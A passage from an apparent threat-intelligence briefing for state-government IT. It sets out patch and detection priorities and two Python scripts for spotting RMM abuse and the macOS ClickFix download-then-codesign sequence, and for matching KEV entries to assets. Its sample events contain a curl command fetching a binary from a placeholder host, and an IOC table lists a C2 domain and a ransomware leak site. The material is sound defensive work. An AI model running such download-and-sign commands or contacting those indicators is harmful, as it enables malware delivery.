<ul> <li><strong>Immediate:</strong> Audit all healthcare-facing web applications for Axios npm dependencies. Prioritize Medicaid enrollment portals and public health reporting systems.</li> <li><strong>7-Day:</strong> Review access controls on systems containing Protected Health Information (PHI). Ensure that web application servers cannot make arbitrary outbound connections.</li> <li><strong>30-Day:</strong> Evaluate web application firewall (WAF) coverage for all citizen-facing healthcare portals. Implement Content Security Policy (CSP) headers to restrict script execution sources.</li>
</ul>
<h3><strong>Government Operations (All Agencies)</strong></h3>
<p>State agencies are in the crosshairs of multiple threat vectors simultaneously: Ivanti EPMM exploitation (mobile device management), BeyondTrust exploitation (privileged access management), Cisco SD-WAN exploitation (network infrastructure), and ransomware groups explicitly targeting government.</p>
<ul> <li><strong>Immediate:</strong> Confirm patch status for Ivanti EPMM (CVE-2026-1281, CVE-2026-1340), BeyondTrust (CVE-2026-1731), and Cisco Catalyst SD-WAN (CVE-2026-20127) across all agencies. These are the three highest-severity actively exploited vulnerabilities affecting government this week.</li> <li><strong>7-Day:</strong> Cross-reference the 18 KEVs added in the past 8 days against the state asset inventory. Prioritize remediation per BOD 22-01 timelines. Deploy detection rules for unauthorized RMM tool installations statewide.</li> <li><strong>30-Day:</strong> Conduct a statewide review of internet-facing appliance inventory. The dominant initial access vector has shifted from phishing to direct exploitation of perimeter appliances — VPNs, MDM servers, SD-WAN controllers, and PAM solutions. Any unpatched internet-facing appliance is now a primary attack surface.</li>
</ul>
<h3><strong>Aviation and Logistics (State DOT, Airports, Port Authorities)</strong></h3>
<p>Ivanti EPMM exploitation campaigns now include transportation in their target set. State departments of transportation managing traffic control systems, airport authorities, and port operations face both the Ivanti MDM risk and the broader Iranian espionage campaign targeting transportation infrastructure.</p>
<ul> <li><strong>Immediate:</strong> Verify Ivanti EPMM patch status for any mobile device management deployments supporting field operations (DOT inspectors, airport security, port operations).</li> <li><strong>7-Day:</strong> Review remote access configurations for transportation control systems. Ensure that field device management does not create a bridge between corporate IT and operational technology networks.</li> <li><strong>30-Day:</strong> Assess supply chain risk for logistics and transportation management software. The Axios npm compromise demonstrates that widely-used software libraries can be weaponized — transportation scheduling, fleet management, and cargo tracking systems may have similar dependencies.</li>
</ul>
<h2><strong>Prioritized Defense Recommendations</strong></h2>
<h3><strong>IMMEDIATE (Within 24 Hours)</strong></h3>
<table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Verify all Ivanti EPMM instances are patched</strong> against CVE-2026-1281 and CVE-2026-1340. Five threat actor campaigns are now exploiting these vulnerabilities with a new malware family (MISTBRICK) specifically targeting government. If unpatched, assume compromise and initiate forensic review before patching.</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>Development / DevOps</p> </td> <td> <p><strong>Audit all state web applications for Axios npm package dependency.</strong> Pin to the verified clean version per CISA alert guidance. Search package-lock.json and yarn.lock files for references to sfrclak[.]com. Block sfrclak[.]com at DNS and web proxy.</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Deploy detection rules for unauthorized RMM tool installations</strong> — specifically AnyDesk, Atera, and Splashtop binaries executing outside approved IT support contexts. Everest ransomware uses all three simultaneously for persistence and lateral movement.</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Confirm patch status for Cisco Catalyst SD-WAN</strong> (CVE-2026-20127, CVSS 10.0) and <strong>BeyondTrust</strong> (CVE-2026-1731, CVSS 9.8). Both are under active exploitation against government targets.</p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Block the following IOCs at network boundary:</strong> Domain sfrclak[.]com (DNS sinkhole + proxy block); SHA-1 3b8855190bfd44f2fc5f93c31f81646ce2c77f68 (endpoint detection block).</p> </td> </tr> </tbody>
</table>
<h3><strong>7-DAY</strong></h3>
<table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>6</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Deploy macOS-specific detection</strong> for the ClickFix attack pattern: monitor for Terminal.app or iTerm2 executing curl/wget commands downloading .bin or .app files, followed by codesign --force --sign - commands. Brief executive staff on fake meeting invitation social engineering via Telegram and unfamiliar channels.</p> </td> </tr> <tr> <td> <p>7</p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Cross-reference the 18 CISA KEV additions from the past 8 days</strong> against the statewide asset inventory. Prioritize remediation per BOD 22-01 timelines. The accelerating KEV tempo (18 in 8 days) indicates a broad exploitation wave.</p> </td> </tr> <tr> <td> <p>8</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Implement Axios supply chain IOC blocking</strong> at the endpoint layer: SHA-1 3b8855190bfd44f2fc5f93c31f81646ce2c77f68. Add sfrclak[.]com to DNS sinkhole if not already completed.</p> </td> </tr> <tr> <td> <p>9</p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Review ICS/SCADA vendor patch status</strong> for the four new advisories: AVEVA Pipeline Simulation, Delta Electronics ASDA-Soft, Horner Cscape/XL PLC, and Anviz products. Coordinate with facility operators for maintenance window scheduling.</p> </td> </tr> <tr> <td> <p>10</p> </td> <td> <p>All Agency IT</p> </td> <td> <p><strong>Conduct statewide RMM tool inventory.</strong> Enumerate all installations of remote access and monitoring software. Remove unauthorized instances. Establish an approved RMM tool list and enforce via application control policies.</p> </td> </tr> </tbody>
</table>
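<p>Actions 3 and 6 each ask the SOC for a detection, and both are easier to reason about as code over concrete events than as prose. The script below is an added example, not Anomali's detection content or any vendor's rule. It assumes an EDR export of one JSON object per line with fields ts, host, user, parent, image and cmdline, and an approved-context list (a support service account and a jump host) that are placeholders; the sample events are constructed. The RMM rule flags AnyDesk, Atera or Splashtop execution outside that context. The ClickFix rule is stateful: it correlates a terminal-spawned curl/wget download of a .bin or .app with a later codesign --force --sign - on the same host.</p>

```python
"""Process-event detections for 24-hour action 3 (unauthorized RMM tools) and
7-day action 6 (macOS ClickFix: terminal-spawned curl/wget download followed by
ad-hoc codesign). Added example, not from the Anomali briefing. The EDR export
schema (one JSON object per line: ts, host, user, parent, image, cmdline), the
approved-context lists and the sample events are constructed assumptions. RMM
products are matched on vendor-name substrings; take exact binary names and
install paths from the vendors' documentation before deploying."""
import json
import re
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

RMM_MARKERS = ("anydesk", "atera", "splashtop")
APPROVED_RMM_USERS = {"svc-helpdesk"}   # assumption: IT support service account
APPROVED_RMM_HOSTS = {"it-jump-01"}     # assumption: sanctioned support jump host
MAC_TERMINALS = {"terminal", "iterm2"}  # parent process names for Terminal.app / iTerm2
DOWNLOAD_RE = re.compile(r"https?://\S+\.(?:bin|app)\b", re.I)
ADHOC_SIGN_RE = re.compile(r"\bcodesign\b.*(?:--force|-f)\b.*(?:--sign|-s)\s+-(?:\s|$)")


def parse_events(lines: Iterable[str]) -> List[Dict]:
    """Parse JSON-lines events and sort by timestamp; the sequence rule needs order."""
    events = []
    for line in lines:
        if line.strip():
            e = json.loads(line)
            e["ts"] = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
            events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def detect_unauthorized_rmm(events: List[Dict]) -> List[Dict]:
    """RMM execution by a user or on a host outside the approved support context.
    Everest runs AnyDesk, Atera and Splashtop together, so one hit is enough."""
    alerts = []
    for e in events:
        haystack = f"{e['image']} {e['cmdline']}".lower()
        if (any(m in haystack for m in RMM_MARKERS)
                and e["user"] not in APPROVED_RMM_USERS
                and e["host"] not in APPROVED_RMM_HOSTS):
            alerts.append({"rule": "rmm_outside_approved_context", "host": e["host"],
                           "user": e["user"], "image": e["image"]})
    return alerts


def detect_mac_clickfix(events: List[Dict], window: timedelta = timedelta(minutes=15)) -> List[Dict]:
    """Stateful two-step rule: curl/wget spawned by a terminal fetching a .bin or
    .app, then codesign --force --sign - (ad-hoc re-signing) on the same host
    within `window`. Either step alone is routine; the pair is the ClickFix shape."""
    alerts, downloads = [], {}
    for e in events:
        name = e["image"].rsplit("/", 1)[-1].lower()
        if (e["parent"].lower() in MAC_TERMINALS and name in ("curl", "wget")
                and DOWNLOAD_RE.search(e["cmdline"])):
            downloads.setdefault(e["host"], []).append(e)
        elif name == "codesign" and ADHOC_SIGN_RE.search(e["cmdline"]):
            for d in downloads.get(e["host"], []):
                if timedelta(0) <= e["ts"] - d["ts"] <= window:
                    alerts.append({"rule": "macos_clickfix_sequence", "host": e["host"],
                                   "download": d["cmdline"], "codesign": e["cmdline"]})
                    break
    return alerts


def run_detections(lines: Iterable[str]) -> Dict[str, List[Dict]]:
    events = parse_events(lines)
    return {"rmm": detect_unauthorized_rmm(events), "clickfix": detect_mac_clickfix(events)}


SAMPLE_EVENTS = r"""
{"ts":"2026-04-21T09:00:00Z","host":"it-jump-01","user":"svc-helpdesk","parent":"services.exe","image":"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe","cmdline":"AnyDesk.exe"}
{"ts":"2026-04-21T09:05:00Z","host":"fin-ws-117","user":"jdoe","parent":"explorer.exe","image":"C:\\Users\\jdoe\\Downloads\\AnyDesk.exe","cmdline":"AnyDesk.exe"}
{"ts":"2026-04-21T09:06:00Z","host":"fin-ws-117","user":"jdoe","parent":"cmd.exe","image":"C:\\Temp\\splashtop_installer.exe","cmdline":"splashtop_installer.exe /silent"}
{"ts":"2026-04-21T10:00:00Z","host":"exec-mbp-03","user":"cio","parent":"Terminal","image":"/usr/bin/curl","cmdline":"curl -fsSL https://example.invalid/update.bin -o /tmp/update.bin"}
{"ts":"2026-04-21T10:00:07Z","host":"exec-mbp-03","user":"cio","parent":"bash","image":"/usr/bin/codesign","cmdline":"codesign --force --deep --sign - /tmp/update.bin"}
{"ts":"2026-04-21T10:30:00Z","host":"dev-mbp-09","user":"dev","parent":"iTerm2","image":"/usr/bin/curl","cmdline":"curl -O https://example.invalid/release-notes.pdf"}
{"ts":"2026-04-21T11:00:00Z","host":"dev-mbp-09","user":"dev","parent":"bash","image":"/usr/bin/codesign","cmdline":"codesign --verify /Applications/Foo.app"}
"""

if __name__ == "__main__":
    for rule, hits in run_detections(SAMPLE_EVENTS.splitlines()).items():
        for hit in hits:
            print(rule, hit)
```

<p>Tune the window and the approved lists to your environment. The sequence requirement is what keeps the codesign check from paging on every developer who ad-hoc signs a local build, and the approved-context check is what turns the RMM inventory from action 10 into an enforceable allow list.</p>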
<h3><strong>30-DAY</strong></h3>
<table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>11</p> </td> <td> <p>CISO</p> </td> <td> <p><strong>Commission an independent assessment of ICS/SCADA security posture</strong> across state-operated water, wastewater, pipeline, and transportation control systems. Iranian threat actors (MuddyWater/MOIS for espionage, CyberAv3ngers/IRGC-CEC for destructive operations) are actively targeting these systems.</p> </td> </tr> <tr> <td> <p>12</p> </td> <td> <p>CISO</p> </td> <td> <p><strong>Evaluate macOS endpoint visibility.</strong> The Lazarus Mach-O Man campaign demonstrates that macOS devices used by executives and senior staff are viable attack vectors. Assess whether current EDR coverage includes macOS Keychain access monitoring, unsigned binary execution detection, and Telegram API exfiltration detection.</p> </td> </tr> <tr> <td> <p>13</p> </td> <td> <p>CISO</p> </td> <td> <p><strong>Conduct a statewide internet-facing appliance audit.</strong> The dominant initial access vector has shifted from phishing to direct exploitation of perimeter appliances — VPN concentrators, MDM servers, SD-WAN controllers, and PAM solutions. Catalog all internet-facing appliances, verify patch currency, and evaluate whether each must be internet-exposed.</p> </td> </tr> <tr> <td> <p>14</p> </td> <td> <p>CISO / CIO</p> </td> <td> <p><strong>Tabletop exercise: ransomware during peak operations.</strong> Simulate an Everest-style ransomware attack encrypting financial transaction systems during a peak processing period. Test backup restoration, communication protocols, and decision-making under pressure. Include the scenario of RMM tools being used as the attack vector.</p> </td> </tr> <tr> <td> <p>15</p> </td> <td> <p>CISO / Legal</p> </td> <td> <p><strong>Review state cybersecurity legislation compliance posture.</strong> Legislative intelligence has been limited in recent collection cycles. 
Proactively review the NCSL Cybersecurity Legislation Tracker and NASCIO resources for pending state and federal requirements that may affect budget, staffing, or compliance obligations.</p> </td> </tr> </tbody>
</table>
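<p>Action 7 (cross-reference the KEV additions against the asset inventory) and action 13 (audit internet-facing appliances for patch currency) are the same join run at two cadences. The script below is an added example, not from Anomali or CISA. It uses the field names of CISA's published KEV JSON (cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse), but its records are constructed: the CVE identifiers are the ones this briefing names, while their dates and product strings are assumptions, and the inventory is fictional. It flags which matches were added in the lookback window, computes days remaining against the catalog due date, and sorts overdue and internet-facing items first.</p>

```python
"""Cross-reference CISA KEV entries with a state asset inventory and order
remediation by BOD 22-01 due date (7-day action 7 and 30-day action 13).
Added example, not from the Anomali briefing or CISA. SAMPLE_KEV mirrors the
field names of CISA's KEV JSON but its dates and product strings are
CONSTRUCTED; only the CVE IDs come from the briefing. The inventory is
fictional. In production, load the live catalog JSON published by CISA."""
import json
import re
from datetime import date, timedelta
from typing import Dict, List

SAMPLE_KEV = json.dumps({
    "title": "constructed KEV excerpt",
    "vulnerabilities": [
        {"cveID": "CVE-2026-1281", "vendorProject": "Ivanti", "product": "Endpoint Manager Mobile (EPMM)",
         "dateAdded": "2026-04-10", "dueDate": "2026-04-17", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-1340", "vendorProject": "Ivanti", "product": "Endpoint Manager Mobile (EPMM)",
         "dateAdded": "2026-04-10", "dueDate": "2026-04-17", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-1731", "vendorProject": "BeyondTrust", "product": "PAM appliance (constructed placeholder)",
         "dateAdded": "2026-04-16", "dueDate": "2026-05-07", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-20127", "vendorProject": "Cisco", "product": "Catalyst SD-WAN",
         "dateAdded": "2026-04-20", "dueDate": "2026-05-11", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

SAMPLE_INVENTORY = [  # constructed statewide asset inventory rows
    {"asset": "mdm-epmm-01", "vendor": "Ivanti", "product": "EPMM", "internet_facing": True, "owner": "IT Operations"},
    {"asset": "sdwan-mgr-01", "vendor": "Cisco", "product": "Catalyst SD-WAN", "internet_facing": True, "owner": "Network"},
    {"asset": "pam-01", "vendor": "BeyondTrust", "product": "PAM appliance", "internet_facing": False, "owner": "IAM"},
    {"asset": "gis-web-02", "vendor": "Esri", "product": "ArcGIS Server", "internet_facing": True, "owner": "Transportation"},
]


def _tokens(s: str) -> set:
    """Lower-cased alphanumeric tokens of length >= 3, for loose product matching."""
    return {t for t in re.split(r"[^a-z0-9]+", s.lower()) if len(t) >= 3}


def kev_added_since(catalog: Dict, since: date) -> List[Dict]:
    """KEV records whose dateAdded is on or after `since` (the 'new this window' set)."""
    return [v for v in catalog["vulnerabilities"] if date.fromisoformat(v["dateAdded"]) >= since]


def match_inventory(catalog: Dict, inventory: List[Dict]) -> List[Dict]:
    """Pair each KEV record with same-vendor assets whose product name shares a
    token with the KEV product string. Deliberately loose: a false pairing costs
    an analyst a minute, a missed one leaves an appliance unpatched."""
    matches = []
    for v in catalog["vulnerabilities"]:
        kev_tokens = _tokens(v["product"])
        for a in inventory:
            if a["vendor"].lower() != v["vendorProject"].lower():
                continue
            if kev_tokens & _tokens(a["product"]):
                matches.append({"asset": a["asset"], "owner": a["owner"], "internet_facing": a["internet_facing"],
                                "cve": v["cveID"], "due_date": v["dueDate"], "date_added": v["dateAdded"],
                                "ransomware_use": v.get("knownRansomwareCampaignUse", "Unknown")})
    return matches


def remediation_plan(catalog: Dict, inventory: List[Dict], today: date, lookback_days: int = 8) -> List[Dict]:
    """Annotate matches with days remaining against the catalog due date and sort:
    overdue first, then soonest due, internet-facing before internal."""
    new_ids = {v["cveID"] for v in kev_added_since(catalog, today - timedelta(days=lookback_days))}
    plan = []
    for m in match_inventory(catalog, inventory):
        remaining = (date.fromisoformat(m["due_date"]) - today).days
        m.update(days_remaining=remaining, overdue=remaining < 0, new_this_window=m["cve"] in new_ids)
        plan.append(m)
    plan.sort(key=lambda m: (m["days_remaining"], not m["internet_facing"], m["cve"]))
    return plan


def demo(today_iso: str = "2026-04-21", lookback_days: int = 8) -> Dict:
    """Run the constructed catalog and inventory through the plan."""
    catalog, today = json.loads(SAMPLE_KEV), date.fromisoformat(today_iso)
    return {"new_count": len(kev_added_since(catalog, today - timedelta(days=lookback_days))),
            "plan": remediation_plan(catalog, SAMPLE_INVENTORY, today, lookback_days)}


if __name__ == "__main__":
    for row in demo()["plan"]:
        flag = "OVERDUE" if row["overdue"] else f"due in {row['days_remaining']}d"
        print(f"{row['asset']:<14} {row['cve']:<16} {flag:<12} new={row['new_this_window']} owner={row['owner']}")
```

<p>In production, replace SAMPLE_KEV with the live catalog JSON and SAMPLE_INVENTORY with a CMDB export, and run it daily: the sort order puts an overdue internet-facing appliance at the top regardless of when the CVE was added, which is the list the CIO's pre-authorized emergency patching window should be spent on.</p>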
<h3><strong>Executive / IR Preparedness</strong></h3>
<table> <thead> <tr> <th> <p>Action</p> </th> <th> <p>Owner</p> </th> <th> <p>Timeframe</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Brief the CIO and agency heads on the Axios supply chain risk — this affects citizen-facing applications and requires cross-agency coordination</p> </td> <td> <p>CISO</p> </td> <td> <p>Immediate</p> </td> </tr> <tr> <td> <p>Confirm incident response retainer is active and the IR provider has current network diagrams and contact information</p> </td> <td> <p>CISO</p> </td> <td> <p>7-Day</p> </td> </tr> <tr> <td> <p>Pre-authorize emergency patching windows for critical vulnerabilities without standard change control delays</p> </td> <td> <p>CIO</p> </td> <td> <p>7-Day</p> </td> </tr> <tr> <td> <p>Review cyber insurance policy for supply chain compromise and ransomware coverage adequacy</p> </td> <td> <p>CISO / Legal / Risk</p> </td> <td> <p>30-Day</p> </td> </tr> <tr> <td> <p>Establish communication protocol with CISA Region and MS-ISAC for coordinated response if a state agency is compromised via any of the active campaigns</p> </td> <td> <p>CISO</p> </td> <td> <p>7-Day</p> </td> </tr> </tbody>
</table>
<h2><strong>IOC Blocking Table </strong></h2>
<p>The following IOCs have been verified through intelligence collection and may be used for immediate blocking and detection:</p>
<table> <thead> <tr> <th> <p>Type</p> </th> <th> <p>Value</p> </th> <th> <p>Context</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Domain</p> </td> <td> <p>sfrclak[.]com</p> </td> <td> <p>Axios npm supply chain C2 infrastructure (DPRK/Sapphire Sleet)</p> </td> <td> <p>DNS sinkhole + proxy block</p> </td> </tr> <tr> <td> <p>SHA-1</p> </td> <td> <p>3b8855190bfd44f2fc5f93c31f81646ce2c77f68</p> </td> <td> <p>Malicious Axios package hash (Kaspersky feed, confidence 100)</p> </td> <td> <p>Endpoint detection block. A hash matches only the exact file it was computed over; installed, rebuilt or bundled copies will not share it, so pair this with the version audit.</p> </td> </tr> <tr> <td> <p>Domain (pattern)</p> </td> <td> <p>*[.]workers[.]dev</p> </td> <td> <p>Cloudflare Workers used as C2 proxy in related DPRK campaigns</p> </td> <td> <p>Monitor — do not blanket-block (legitimate use is common); alert on connections from non-browser processes</p> </td> </tr> <tr> <td> <p>Onion</p> </td> <td> <p>ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad[.]onion</p> </td> <td> <p>Everest ransomware data leak site</p> </td> <td> <p>Reference indicator for leak-site monitoring. The .onion address never appears in clear-text network traffic, so network detection relies on identifying Tor client connections from internal hosts, not on this string.</p> </td> </tr> </tbody>
</table>
<p>Additional IOCs for the campaigns discussed in this report are available through Anomali ThreatStream Next-Gen and partner feeds. MISTBRICK malware hashes have not yet been published in available feeds — monitor vendor advisories for updates.</p>
<h2><strong>Bottom Line </strong></h2>
<p>The threat environment facing state government has shifted. The days when phishing emails were the primary concern are behind us. Today's adversaries — North Korean supply chain operators, Iranian infrastructure saboteurs, Russian intelligence services, and ransomware syndicates that explicitly target government — are exploiting the appliances, software libraries, and management tools that form the backbone of state IT operations.</p>
<p>The convergence is the message. A single compromised JavaScript library is simultaneously a supply chain incident, a nation-state operation, and a patch management failure. An unpatched mobile device management server is not just a vulnerability — it is an invitation to five different threat actor groups. A whitelisted remote support tool is not just convenient — it is the exact tool a ransomware operator will use to move through your network.</p>
<p>Three actions matter most right now:</p>
<ol> <li><strong>Patch Ivanti EPMM today.</strong> Not this week. Today. Five campaigns. New malware. Government targets confirmed.</li> <li><strong>Audit Axios dependencies today.</strong> Every state web application. Every package-lock.json. Block sfrclak[.]com at the network edge.</li> <li><strong>Hunt for unauthorized RMM tools today.</strong> AnyDesk, Atera, Splashtop. If they are not on your approved list, they should not be on your network.</li>
</ol>
<p>The threat actors are not waiting. Neither should we.</p>
<p><em>Anomali CTI Desk — 2026-04-21</em></p>
<p><em>For questions or to request additional intelligence on any topic covered in this briefing, contact your Anomali representative or the CTI Desk directly.</em> <em>IOCs and machine-readable indicators are available via Anomali ThreatStream Next-Gen.</em></p>